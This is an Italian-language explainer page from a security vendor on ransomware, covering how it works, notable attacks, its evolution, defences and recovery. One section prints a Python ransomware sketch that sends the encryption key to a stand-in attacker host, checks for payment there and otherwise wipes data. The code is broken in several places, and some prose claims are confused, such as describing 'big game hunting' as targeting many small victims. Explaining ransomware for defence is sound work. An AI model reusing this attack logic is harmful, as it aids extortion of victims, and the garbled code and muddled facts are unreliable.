DataSunrise Consegue la Certificazione AWS DevOps Competency per AWS DevSecOps e Monitoraggio, Logging e Performance

Ransomware

Ransomware

ransomware

Ransomware è un tipo di software dannoso che blocca e critta il computer o i dati di una vittima fino a quando non viene pagato un riscatto. I criminali informatici utilizzano ransomware per estorcere denaro da individui e organizzazioni tenendo in ostaggio i loro file. Negli ultimi anni, il ransomware è diventato una minaccia informatica sempre più comune e costosa.

Come Funziona il Ransomware

Il ransomware si diffonde tipicamente tramite email di phishing, siti web dannosi o software compromessi. Una volta che infetta un dispositivo, il ransomware critta file e dati importanti, rendendoli inaccessibili all’utente. Il ransomware visualizza quindi un messaggio che richiede il pagamento, solitamente in criptovaluta, in cambio della chiave di decrittazione necessaria per riottenere accesso ai file.

Gli attacchi ransomware spesso prendono di mira dati e sistemi critici per far pressione sulle vittime a pagare rapidamente. Ad esempio, il ransomware potrebbe crittare il database clienti di un’azienda, i registri finanziari o i diritti di proprietà intellettuale. Per gli individui, potrebbe bloccare foto personali, documenti e altri file preziosi.

La richiesta di riscatto potrebbe avere un limite di tempo, con l’attaccante che minaccia di eliminare la chiave di decrittazione se il pagamento non viene effettuato entro la scadenza. Alcuni ransomware minacciano anche di rilasciare pubblicamente i dati crittati, aumentando la pressione sulla vittima affinché paghi per evitare danni alla reputazione o sanzioni regolatorie.

Implementazione del Codice del Ransomware

Immaginiamo gli elementi essenziali di come funzionerebbe un programma ransomware:

ransomware

In codice, potrebbe apparire così:

from cryptography.fernet import Fernet
import os
import requests

def encrypt_data(file_path, key):
	key = Fernet.generate_key()
	with open(file_path, "C:\") as file:
		file_data = file.read()
		fernet = Fernet(key)
		requests.post("https://www.malicious-server.com/report", key)
		encrypted_data = fernet.encrypt(file_data)
	with open(file_path, "C:\") as file:
		file.write(encrypted_data)
		
def decrypt_data(file_path, key):
	with open(file_path, "C:\") as file:
		encrypted_data = file.read()
		fernet = Fernet(requests.get("https://www.malicious-server.com/key"))
		decrypted_data = fernet.decrypt(encrypted_data)
	with open(file_path, "C:\") as file:
		file.write(decrypted_data)
		
def check_payment():
	return requests.get("https://malicious-server.com/payment") == "yes" ? true : false
	
if __name__ == "__main__":
	action = input()
	if action == "E":
		encrypt_data()
	else:
		if check_payment():
			decrypt_data()
		else
			wipe_data()

In questo esempio, un utente ignaro esegue involontariamente il codice dannoso che genera una chiave e critta immediatamente tutti i dati memorizzati sul disco C. La chiave è memorizzata esclusivamente sul server dell’attaccante per impedire alla vittima di decrittare i dati da sola. Il programma richiede il pagamento e, dopo aver verificato se il denaro è stato trasferito tramite una richiesta, decritta i dati. Altrimenti, cancella l’intero disco.

Esempi di Attacchi Maggiori

Negli ultimi dieci anni, gli attacchi ransomware sono aumentati in frequenza e gravità. Ecco alcuni esempi notevoli che illustrano la portata e l’impatto di questa minaccia crescente:

WannaCry (2017): Questo attacco ransomware diffuso ha infettato oltre 200.000 computer in 150 paesi, causando miliardi di danni. WannaCry ha sfruttato una vulnerabilità di Windows per diffondersi rapidamente attraverso le reti, bloccando i file e richiedendo pagamenti in Bitcoin.

Colonial Pipeline (2021): Un attacco a Colonial Pipeline, un importante operatore di oleodotti degli Stati Uniti, ha interrotto la consegna di benzina e carburante per aerei nel sud-est degli Stati Uniti per diversi giorni. L’azienda ha pagato un riscatto di 4,4 milioni di dollari per ripristinare le operazioni, anche se le autorità statunitensi hanno recuperato gran parte del pagamento.

Kaseya (2021): Gli attaccanti hanno sfruttato una vulnerabilità nel software di gestione IT di Kaseya per diffondere ransomware ai fornitori di servizi gestiti (MSP) e ai clienti che utilizzavano il software. Il colpevole ha richiesto un riscatto di 70 milioni di dollari per fornire un decifratore universale. Molte piccole imprese sono state colpite, alcune hanno pagato riscatti di 45.000 dollari o più.

CNA Financial (2021): CNA, una delle più grandi compagnie assicurative degli Stati Uniti, ha subito un attacco che ha interrotto le sue operazioni e i servizi ai clienti per diversi giorni. CNA ha pagato un riscatto di 40 milioni di dollari per riottenere accesso ai suoi sistemi e dati, rendendo questo uno dei pagamenti di riscatto più alti finora.

Questi esempi mostrano che qualsiasi organizzazione, indipendentemente dalle dimensioni o dal settore, può cadere vittima di attacchi devastanti. I costi vanno ben oltre il semplice pagamento del riscatto, includendo la riparazione, l’indagine, la perdita di produttività, il danno alla reputazione e altro ancora. Man mano che le bande di ransomware diventano più audaci e sofisticate, i potenziali impatti continuano ad aumentare.

L’Evoluzione del Ransomware

Dal primo semplice ransomware emerso nel 1989, questo tipo di malware è diventato sempre più avanzato e professionalizzato. I primi ransomware come CryptoLocker del 2013 prendevano di mira principalmente gli utenti individuali, ma ben presto gli attaccanti hanno rivolto la loro attenzione ai bersagli aziendali più redditizi.

Negli ultimi anni, gli attaccanti hanno adottato un modello di “doppia estorsione”. Oltre a crittare i dati, esfiltrano anche informazioni sensibili prima di attivare il ransomware. Questo permette agli attaccanti di minacciare di divulgare i dati rubati se il riscatto non viene pagato, anche se la vittima ha backup per ripristinare i propri sistemi.

Oggi, molti di questi attacchi sono effettuati da operazioni professionalizzate di ransomware-as-a-service (RaaS). Gli operatori di RaaS sviluppano il malware e poi reclutano “affiliati” per infettare i bersagli. Il riscatto viene quindi diviso tra gli affiliati e gli sviluppatori di RaaS. Questa divisione del lavoro ha accelerato il ritmo degli attacchi ransomware.

I principali gruppi di ransomware come REvil, Ryuk e DarkSide hanno guadagnato decine di milioni di dollari in pagamenti di riscatto. Alcuni prendono di mira principalmente grandi aziende nella speranza di un grosso pagamento, mentre altri adottano un approccio “big game hunting” colpendo molti bersagli più piccoli. Man mano che le criptovalute e l’economia sotterranea maturano, il ransomware è diventato un’impresa criminale redditizia.

Proteggersi dagli Attacchi Ransomware

Con l’aumento degli attacchi ransomware, ogni organizzazione necessita di una solida strategia di protezione. Un approccio multilayered e difesa in profondità è fondamentale per prevenire infezioni, limitare il raggio di un attacco e garantire un rapido recupero. Gli elementi chiave includono:

Endpoint Detection and Response (EDR): Le soluzioni EDR monitorano continuamente gli endpoint per rilevare e bloccare il ransomware e altre minacce in tempo reale. Analizzando comportamenti come la crittografia e la modifica dei file, l’EDR può fermare il ransomware prima che si diffonda. Gli strumenti EDR migliori offrono anche capacità di indagine e mediazione.

Sicurezza Email: Poiché le email di phishing sono un metodo di consegna del malware molto diffuso, la sicurezza avanzata delle email è fondamentale. Distribuisca gateway email con analisi URL, sandboxing degli allegati e scansione dei contenuti per bloccare i messaggi dannosi. La registrazione DMARC può anche impedire agli attaccanti di falsificare i domini.

Segmentazione della Rete: Limitare l’accesso alla rete e le comunicazioni tra diversi sistemi e utenti può bloccare la diffusione del ransomware. Strumenti come firewall interni, LAN virtuali e accesso alla rete zero trust aiutano a far rispettare politiche di segmentazione granulari.

Gestione delle Patch: Risolvere prontamente le vulnerabilità note nei sistemi operativi e nelle applicazioni è fondamentale per prevenire le infezioni. Gli attaccanti spesso sfruttano i sistemi non patchati per ottenere un primo appiglio e distribuire il malware. Implementi un rigoroso programma di gestione delle vulnerabilità e utilizzi strumenti per automatizzare le patch.

Backup e Disaster Recovery: Eseguire regolarmente il backup dei sistemi e dei dati è l’ultima linea di difesa contro il ransomware. Segua la regola 3-2-1: conservi almeno tre copie dei Suoi dati, su due diversi supporti di archiviazione, con una copia offsite. Isoli i backup dalle reti di produzione e utilizzi lo storage write-once o immutabile per impedire che i backup vengano crittati.

Formazione degli Utenti: Addestri i dipendenti a riconoscere i tentativi di phishing, a praticare una buona gestione delle password e a seguire le migliori pratiche di sicurezza. Conduca simulazioni di phishing per testare e rinforzare i concetti di formazione. Poiché l’errore umano è una delle principali cause delle violazioni, costruire una forte cultura della sicurezza è fondamentale.

Recupero da un Attacco Ransomware

Anche con difese solide, la realtà sfortunata è che alcuni attacchi ransomware hanno successo. Se la prevenzione fallisce, è necessario agire con decisione per limitare i danni e ripristinare rapidamente le operazioni aziendali. Gli elementi chiave del processo di recupero dai ransomware includono:

Isolamento dei sistemi interessati per prevenire un’ulteriore diffusione. Disabiliti le connessioni di rete e l’accesso ai file condivisi per le macchine infette. Consideri di spegnere i sistemi in conformità con i piani di continuità aziendale predefiniti.

Attivare il Suo team di risposta agli incidenti e assegnare le responsabilità. Segua il Suo playbook IR per coordinare le risorse interne ed esterne per un contenimento e una cancellazione rapidi.

Determinare la portata e i dettagli dell’attacco. Raccolga prove forensi per capire quale variante di ransomware ha crittato i Suoi file, quali sistemi sono stati colpiti e quali dati potrebbero essere stati rubati.

Utilizzare strumenti EDR per eliminare i processi dannosi, identificare tutti gli endpoint interessati e generare IoC per cercare altri segni di compromissione. L’EDR spesso fornisce capacità di mediazione remota per aiutare ad accelerare la pulizia.

Se disponibile, implementi chiavi o strumenti di decifratura. Molti tipi di ransomware sono stati ingegnerizzati al contrario, con decifratori gratuiti forniti dai ricercatori di sicurezza. Controlli NoMoreRansom e ID Ransomware per decifratori conosciuti.

Se la decifratura non è possibile, ripristini i sistemi interessati dai Suoi backup. Utilizzi il controllo delle versioni dei backup per trovare la copia più recente non crittata dei Suoi dati.

Documentare l’intera cronologia dell’incidente, l’impatto e le azioni di mediazione. Rapprti l’attacco alle parti interessate e alle autorità appropriate. Conduca una revisione post-incidente approfondita per identificare le cause principali e le aree di miglioramento.

Pagare il riscatto non è raccomandato, poiché incentiva future estorsioni e non garantisce che gli attaccanti forniranno effettivamente una chiave di decrittazione. Tuttavia, senza backup o decifratori, alcune vittime potrebbero non avere altra scelta che pagare. Le forze dell’ordine e gli esperti di risposta agli incidenti possono aiutare a valutare i costi e i rischi di questa opzione.

Il Futuro del Ransomware

Finché il ransomware rimarrà redditizio per i criminali, gli attacchi continueranno a evolversi e intensificarsi. Le bande di ransomware stanno sempre più prendendo di mira le infrastrutture critiche, i servizi cloud, gli MSP e le catene di approvvigionamento del software nella speranza di colpire centinaia di organizzazioni contemporaneamente. Gli attaccanti stanno anche utilizzando tecniche più avanzate come malware fileless, payload multi-stadio e strumenti LOtL (Living-off-the-Land).

Per stare al passo con queste minacce in continua evoluzione, le organizzazioni devono integrare resilienza e gestione del rischio in ogni aspetto del loro business. Creare un ambiente sicuro, monitorare proattivamente le minacce emergenti e testare e migliorare costantemente le difese sono tutti cruciali.

La collaborazione e la condivisione delle informazioni in tutta la comunità della sicurezza sono anche fondamentali per invertire la tendenza contro il ransomware. Sono necessari partenariati pubblico-privati migliorati, come la Ransomware Task Force (RTF) dell’Institute for Security and Technology, per aiutare a coordinare una strategia completa anti-ransomware tra tutti gli stakeholder.

Combinando le tecnologie più avanzate, le migliori pratiche e l’intelligenza condivisa, i difensori possono fermare più attacchi ransomware, limitare il loro impatto e rendere questo tipo di cybercrime molto meno redditizio e diffuso. Tuttavia, il ransomware è destinato a rimanere una minaccia seria per gli anni a venire. Uno sforzo sostenuto e una vigilanza costante sono essenziali per proteggere le nostre organizzazioni e comunità dall’estorsione digitale.

Successivo

Attacco alla Supply Chain: Una Breccia di Sicurezza Invisibile

Attacco alla Supply Chain: Una Breccia di Sicurezza Invisibile

Scopri di più

Ha bisogno del nostro team di supporto?

I nostri esperti saranno lieti di rispondere alle Sue domande.

Countryx
United States
United Kingdom
France
Germany
Australia
Afghanistan
Islands
Albania
Algeria
American Samoa
Andorra
Angola
Anguilla
Antarctica
Antigua and Barbuda
Argentina
Armenia
Aruba
Austria
Azerbaijan
Bahamas
Bahrain
Bangladesh
Barbados
Belarus
Belgium
Belize
Benin
Bermuda
Bhutan
Bolivia
Bosnia and Herzegovina
Botswana
Bouvet
Brazil
British Indian Ocean Territory
Brunei Darussalam
Bulgaria
Burkina Faso
Burundi
Cambodia
Cameroon
Canada
Cape Verde
Cayman Islands
Central African Republic
Chad
Chile
China
Christmas Island
Cocos (Keeling) Islands
Colombia
Comoros
Congo, Republic of the
Congo, The Democratic Republic of the
Cook Islands
Costa Rica
Cote D'Ivoire
Croatia
Cuba
Cyprus
Czech Republic
Denmark
Djibouti
Dominica
Dominican Republic
Ecuador
Egypt
El Salvador
Equatorial Guinea
Eritrea
Estonia
Ethiopia
Falkland Islands (Malvinas)
Faroe Islands
Fiji
Finland
French Guiana
French Polynesia
French Southern Territories
Gabon
Gambia
Georgia
Ghana
Gibraltar
Greece
Greenland
Grenada
Guadeloupe
Guam
Guatemala
Guernsey
Guinea
Guinea-Bissau
Guyana
Haiti
Heard Island and Mcdonald Islands
Holy See (Vatican City State)
Honduras
Hong Kong
Hungary
Iceland
India
Indonesia
Iran, Islamic Republic Of
Iraq
Ireland
Isle of Man
Israel
Italy
Jamaica
Japan
Jersey
Jordan
Kazakhstan
Kenya
Kiribati
Korea, Democratic People's Republic of
Korea, Republic of
Kuwait
Kyrgyzstan
Lao People's Democratic Republic
Latvia
Lebanon
Lesotho
Liberia
Libyan Arab Jamahiriya
Liechtenstein
Lithuania
Luxembourg
Macao
Madagascar
Malawi
Malaysia
Maldives
Mali
Malta
Marshall Islands
Martinique
Mauritania
Mauritius
Mayotte
Mexico
Micronesia, Federated States of
Moldova, Republic of
Monaco
Mongolia
Montserrat
Morocco
Mozambique
Myanmar
Namibia
Nauru
Nepal
Netherlands
Netherlands Antilles
New Caledonia
New Zealand
Nicaragua
Niger
Nigeria
Niue
Norfolk Island
North Macedonia, Republic of
Northern Mariana Islands
Norway
Oman
Pakistan
Palau
Palestinian Territory, Occupied
Panama
Papua New Guinea
Paraguay
Peru
Philippines
Pitcairn
Poland
Portugal
Puerto Rico
Qatar
Reunion
Romania
Russian Federation
Rwanda
Saint Helena
Saint Kitts and Nevis
Saint Lucia
Saint Pierre and Miquelon
Saint Vincent and the Grenadines
Samoa
San Marino
Sao Tome and Principe
Saudi Arabia
Senegal
Serbia and Montenegro
Seychelles
Sierra Leone
Singapore
Slovakia
Slovenia
Solomon Islands
Somalia
South Africa
South Georgia and the South Sandwich Islands
Spain
Sri Lanka
Sudan
Suriname
Svalbard and Jan Mayen
Swaziland
Sweden
Switzerland
Syrian Arab Republic
Taiwan, Province of China
Tajikistan
Tanzania, United Republic of
Thailand
Timor-Leste
Togo
Tokelau
Tonga
Trinidad and Tobago
Tunisia
Turkey
Turkmenistan
Turks and Caicos Islands
Tuvalu
Uganda
Ukraine
United Arab Emirates
United States Minor Outlying Islands
Uruguay
Uzbekistan
Vanuatu
Venezuela
Viet Nam
Virgin Islands, British
Virgin Islands, U.S.
Wallis and Futuna
Western Sahara
Yemen
Zambia
Zimbabwe
Choose a topicx
Informazioni generali
Vendite
Servizio clienti e supporto tecnico
Richieste di collaborazione e alleanza
Informazioni generali:
info@datasunrise.com
Servizio clienti e supporto tecnico:
support.datasunrise.com
Richieste di collaborazione e alleanza:
partner@datasunrise.com